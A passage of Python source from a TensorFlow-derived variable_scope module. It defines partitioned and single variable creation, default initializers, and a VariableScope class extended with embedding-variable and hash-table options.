raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
embedding_block_num=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE,
invalid_key=None,
evconfig=variables.EmbeddingVariableConfig(),
ht_partition_num=1000):
is_scalar = (
shape is not None and isinstance(shape, collections_lib.Sequence) and
not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError("Partitioner must be callable, but received: %s" %
partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(
name=name,
shape=shape,
embedding_block_num=embedding_block_num,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation,
invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(
name=name,
shape=shape,
embedding_block_num=embedding_block_num,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation,
invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
embedding_block_num=embedding_block_num,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation,
invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
synchronization, aggregation, trainable = (
variables.validate_synchronization_aggregation_trainable(
synchronization, aggregation, trainable, name))
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"embedding_block_num": embedding_block_num,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
"invalid_key": invalid_key,
"evconfig": evconfig,
"ht_partition_num": ht_partition_num,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
embedding_block_num=embedding_block_num,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation,
invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
embedding_block_num=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE,
invalid_key=None,
evconfig=variables.EmbeddingVariableConfig(),
ht_partition_num=1000):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable (defaults to
`DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if invalid_key is not None:
# EmbedingVariable: extend shape to reuse Variable partition process
# first demension is unused
shape_t = tensor_shape.as_shape([sys.maxsize]).concatenate(shape)
fd_partition_num = partitioner(shape=shape_t, dtype=dtype)[0]
shape = tensor_shape.as_shape([fd_partition_num]).concatenate(shape)
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?" % name)
existing_var = self._partitioned_vars[name]
from tensorflow.python.ops.hash_table import hash_table
if isinstance(existing_var, (hash_table.HashTable, hash_table.DistributedHashTable)):
raise ValueError(
"Trying to reuse partitioned variable %s, but an existing variable is a"
" HashTable or DistributedHashTable, can not reuse it." % (name))
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s." % (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s." % (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not." %
(num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d." %
(num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(
_iter_slices(shape.as_list(), num_slices, slice_dim)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
if invalid_key is not None:
init_shape = shape.as_list()[1:]
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
embedding_block_num=embedding_block_num,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation,
invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
# pylint: disable=protected-access
var._set_save_slice_info(
variables.Variable.SaveSliceInfo(name, shape.as_list(), var_offset,
var_shape, var_full_name=var_full_name))
if isinstance(var, kv_variable_ops.DynamicEmbeddingVariable):
for ev in var._ev_list:
ev._set_save_slice_info(variables.Variable.SaveSliceInfo(
ev.name, shape.as_list(), var_offset, var_shape, var_full_name=var_full_name))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(
name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
embedding_block_num=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE,
invalid_key=None,
evconfig=variables.EmbeddingVariableConfig(),
ht_partition_num=1000):
"""Get or create a single Variable (e.g.
a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" %
(err_msg, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
from tensorflow.python.ops.hash_table import hash_table
if isinstance(found_var, (hash_table.HashTable, hash_table.DistributedHashTable)):
raise ValueError(
"Trying to reuse variable %s, but an existing variable is a"
" HashTable or DistributedHashTable, can not reuse it." % (name))
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." %
(name, shape, found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." %
(name, dtype_str, found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer()
if shape is not None and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(),
dtype=dtype,
partition_info=partition_info)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
embedding_block_num=embedding_block_num,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
invalid_key=invalid_key,
evconfig=evconfig,
embedding_initializer=initializer,
ht_partition_num=ht_partition_num)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(
1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool or
dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required" %
(name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export(v1=["no_regularizer"])
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.compat.v1.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults to
False (will later change to True). When eager execution is enabled this
argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def get_hash_table(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
collections=None,
reuse=None,
trainable=True,
synchronization=VariableSynchronization.AUTO,
partitioner=None,
children=None):
"""Gets an existing variable with this name or create a new one."""
if partitioner is None:
partitioner = self._partitioner
if not context.executing_eagerly():
if reuse is None:
reuse = self._reuse
else:
reuse = AUTO_REUSE
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if dtype is None:
dtype = self._dtype
return var_store.get_hashtable(full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
reuse=reuse,
collections=collections,
trainable=trainable,
synchronization=synchronization,
partitioner=partitioner,
children=children)
def get_embedding_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
invalid_key=None,
evconfig=variables.EmbeddingVariableConfig(),
ht_partition_num=1000):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if not context.executing_eagerly():
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
else:
reuse = AUTO_REUSE
use_resource = True
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
if invalid_key is None:
invalid_key = -1
return var_store.get_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint, invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
def get_dynamic_dimension_embedding_variable(self,
var_store,
name,
shape=None,
embedding_block_num=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
invalid_key=None,
evconfig=variables.EmbeddingVariableConfig(),
ht_partition_num=1000):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if not context.executing_eagerly():
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
else:
reuse = AUTO_REUSE
use_resource = True
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
if invalid_key is None:
invalid_key = -1
return var_store.get_variable(
full_name, shape=shape, embedding_block_num=embedding_block_num,
dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, custom_getter=custom_getter,
constraint=constraint, invalid_key=invalid_key,
evconfig=evconfig,
ht_partition_num=ht_partition_num)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
